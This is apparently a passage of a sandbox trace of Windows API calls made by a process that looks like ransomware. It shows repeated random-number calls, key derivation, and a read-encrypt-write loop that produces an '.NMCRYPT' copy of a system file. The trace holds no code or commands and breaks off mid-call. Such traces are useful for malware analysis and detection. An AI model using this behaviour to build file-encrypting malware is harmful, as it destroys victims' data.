[0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.066] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0161.066] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0161.067] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0161.067] CryptHashData (hHash=0x9ad338, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.067] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad7b8) returned 1 [0161.067] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0161.067] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0161.067] wcslen (_String="\\\\?\\") returned 0x4 [0161.067] CryptDuplicateKey (in: hKey=0x9ad7b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad7f8) returned 1 [0161.067] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0161.068] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0161.068] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8192) returned 1 [0161.068] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0161.068] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.070] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.070] GetLastError () returned 0x0 [0161.070] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.099] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.099] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.099] GetLastError () returned 0x0 [0161.099] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.099] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.099] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.099] GetLastError () returned 0x0 [0161.099] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.099] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.099] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.099] GetLastError () returned 0x0 [0161.099] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.100] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.100] GetLastError () returned 0x0 [0161.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.100] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.100] GetLastError () returned 0x0 [0161.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.100] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.100] GetLastError () returned 0x0 [0161.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.100] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.100] GetLastError () returned 0x0 [0161.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.100] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.100] GetLastError () returned 0x0 [0161.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.100] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.100] GetLastError () returned 0x0 [0161.100] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.100] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.101] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.101] GetLastError () returned 0x0 [0161.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.101] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.101] GetLastError () returned 0x0 [0161.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.101] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.101] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.101] GetLastError () returned 0x0 [0161.101] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, 